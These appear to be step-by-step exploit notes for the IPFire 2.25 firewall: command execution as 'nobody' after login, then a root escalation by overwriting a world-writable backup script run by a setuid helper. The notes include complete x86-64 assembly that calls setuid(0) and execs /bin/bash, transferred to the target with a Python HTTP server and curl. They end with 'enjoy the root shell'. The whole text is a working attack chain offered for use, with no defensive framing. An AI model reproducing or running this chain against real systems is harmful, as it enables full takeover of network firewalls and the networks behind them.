- system run command when install any packet
- system getting 7zip from just html
- and check the tmp directory
- version 2.25 - core update 156
- ipfire allows run arbitrary os command as nobody after login
- check the suid binaries
- backup program run another script. /var/ipfire/backup/bin/backup.pl (it is a bash script and permission is looky good)
- try the write in to bash script. (No error. GOOD!)
- try run bash
- yes. we can run but it is low-privegled. we must trig to setuid(0)!
- save this and run
alti name.asm q - alti is my own compile-check program in soo_deep repo.
bits 64
section .data
string db "/bin/bash",0x00
olmadis db "basarisiz.",0x0a,0x00
olmadil equ $-olmadis
section .text
global main
main:
mov rax,105
mov rdi,0
syscall
cmp rax,0
je getbash
mov rax,1
mov rdi,1
mov rsi,olmadis
mov rdx,olmadil
syscall
mov rax,60
xor rdi,rdi
syscall
getbash:
mov rax,59
mov rdi,string
mov rsi,0
mov rdx,0
syscall-
and write the new program to /var/ipfire/backup/bin/backup.pl. (we can python http server and curl to write)
-
and enjoy the root shell!
